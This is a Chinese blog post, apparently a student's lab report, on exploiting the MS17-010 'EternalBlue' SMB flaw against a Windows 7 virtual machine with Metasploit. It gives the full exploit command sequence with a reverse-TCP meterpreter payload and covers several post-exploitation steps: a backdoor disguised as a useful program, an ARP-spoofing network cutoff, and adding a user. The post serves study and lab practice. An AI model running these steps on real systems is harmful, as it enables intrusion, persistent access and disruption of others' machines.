【网络安全】MS17-010“永恒之蓝”漏洞的利用

这篇具有很好参考价值的文章主要介绍了【网络安全】MS17-010“永恒之蓝”漏洞的利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

导语

最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。

一、实验原理

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、实验环境

【网络安全】MS17-010“永恒之蓝”漏洞的利用

三、实验记录

一次渗透的基本步骤

(1)启动kali虚机,进入root权限打开Metasploit渗透工具。
msfconsole
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(2)打开另一个窗口,扫描一下靶机是否开启了445端口以及查看版本信息
nmap -sV -p 445 192.168.79.129(靶机地址)。
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(3)search:搜索msf中相关组件
利用模块进行漏洞验证、。
search ms17-010
【网络安全】MS17-010“永恒之蓝”漏洞的利用

(4)使用use auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞。

(5)然后查看具体需要配置的东西
show options
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(6)设置攻击目标及端口
set rhosts 192.168.79.129
set rport 445
配置完后使用run命令开始测试
【网络安全】MS17-010“永恒之蓝”漏洞的利用
host likely vulnerable to MS17-010
表示主机存在这个漏洞,可以利用攻击。
host does not appear vulnerable
主机不易受到攻击 / 不存在这个漏洞。

注:实验一开始靶机选取的是OWASP,经过验证后发现不存在MS17-010漏洞,故更换为win7虚拟机。

补充:
(1)渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

(2)攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。

(3)模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。


四、实验步骤

(1)关闭防火墙,ping通两台主机使其能访问外网。

在一台宿主主机上安装两个不同的虚拟机镜像构建一个虚拟的网络,其中,一台虚拟机为win7,一台虚拟机为Kali Linux。

  • 打开VMware,“编辑”——“虚拟网络映射器”——“桥接模式”
    【网络安全】MS17-010“永恒之蓝”漏洞的利用
  • 将两台虚拟机的IP地址分配方式为自动获取(也就是动态IP)。

win7:“控制面板”——>“网络和Internet”——>“网络和共享中心”——>“更改适配器设置”——>选择网卡然后右击“属性”——>选择“TCP/IPV4”——>“属性”,选择“自动获得IP地址”——>点击“确定”即可。
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
**Kali Linux:**打开/etc/network/interfaces文件,配置interfaces文件
gedit /etc/network/interfaces

#The primary network interface
auto eth0
iface eth0 inet dhcp

【网络安全】MS17-010“永恒之蓝”漏洞的利用

  • Kali Linux通过ifconfig查看IP地址(注意不是ip),测试连通性。
    【网络安全】MS17-010“永恒之蓝”漏洞的利用
    【网络安全】MS17-010“永恒之蓝”漏洞的利用
    【网络安全】MS17-010“永恒之蓝”漏洞的利用

(2)代码植入控制靶机
msfconsole打开metasploit工具
search ms17_010查找漏洞
use exploit/windows/smb/ms17_010_eternalblue使用"永恒之蓝"攻击代码植入漏洞
set RHOST 192.168.47.132设置靶机
set LHOST 192.168.47.131设置攻击机
set payload windows/x64/meterpreter/reverse_tcp设置有效载荷
show options显示选项设置
run进行攻击
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
到这就算成了(* ̄rǒ ̄)。

五、实现小操作

(1)输入sysinfo查看系统信息。【网络安全】MS17-010“永恒之蓝”漏洞的利用
(2)screenshot截取靶机正在浏览的页面,并保存到攻击机。【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(3)输入shell进入win7控制台,与在win7中具有同样效果。
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(4)上传一个文件1.jpg给靶机
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(5)生成后门程序,然后将后门伪装成一个有用的程序上传到受害者系统,在攻击端利用use exploit/multi/handler监听消息 ,对方点开程序后我们会收到消息,就可以知道装入成功了。
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
有了后门以后,不用再输入对方IP,即使对方改了IP地址也可以进入。
【网络安全】MS17-010“永恒之蓝”漏洞的利用

(6)查看操作系统补丁情况
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(7)ARP断网攻击,给他把网断老。

-i 指定网卡

-t 指定目标ip

这里的192.168.47.2是网关
【网络安全】MS17-010“永恒之蓝”漏洞的利用

【网络安全】MS17-010“永恒之蓝”漏洞的利用

ARP断网攻击,欺骗对方无法上网,ctrl+c停止欺骗
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(8)在win7上新建一个用户
【网络安全】MS17-010“永恒之蓝”漏洞的利用
【网络安全】MS17-010“永恒之蓝”漏洞的利用
(9)没了

原理

“永恒之蓝”漏洞工具利用了c v e - 2 0 1 7 -0144漏洞。cve -2017-0144漏洞错误处理了网络传入的数据长度,导致复制数据时出现内存溢出。
溢出的数据覆盖了用于接收数据的内存区域指针,把合法地址修改成了系统保留区域(KI_USER_SHARED_DATA0xf fdf0000)的地址,导致后续发来的数据覆盖了系统保留区域。系统保留区域中存放了系统调用返回(SystemCallReturn)地址,从而在网络接收系统调用完成后会跳转到攻击者精心布置的代码中,使攻击者成功执行shellcode获得超级用户权限。

总结

老师一直不在,自己查资料坐牢一样,尤其是OWASP虚拟机搞半天没那个漏洞,差点换课题,总算混完了,还两门考试没复习呢摸了摸了。。(* ̄rǒ ̄)文章来源地址https://www.toymoban.com/news/detail-471577.html

到了这里,关于【网络安全】MS17-010“永恒之蓝”漏洞的利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(52)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(41)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(39)
  • 永恒之蓝漏洞 ms17_010 详解

    永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企

    2024年02月08日
    浏览(39)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(86)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(43)
  • MS17-010 永恒之蓝漏洞利用方式

    Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux  192.168.109.130 目标靶机:windows7  192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描  发现目

    2024年02月09日
    浏览(41)
  • 主机漏洞利用演示MS17-010(永恒之蓝)

    ms17-010危害:对被攻击方的电脑造成蓝屏! 申明:本篇文章的用意仅做学习使用 网络搭建环境: 软件:Vmware Workstation 17 攻击机:Kali 靶机环境:Windows 7 Nmap软件的基本功能: 1、主机发现(Host Discovery) 2、端口扫描(Port Scanning) 3、版本侦测(Version Detection) 4、操作系统侦

    2024年02月15日
    浏览(42)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(39)
  • 永恒之蓝漏洞复现(ms17-010)----保姆级教程

    攻击机: kali Linux             靶机: win7 x64    提示:  复现攻击前请关闭杀毒软件   1.复现第一步按以下操作打开 445端口: 在 \\\"运行\\\" 里输入: regedit 打开注册表编辑器                                                                    

    2023年04月08日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包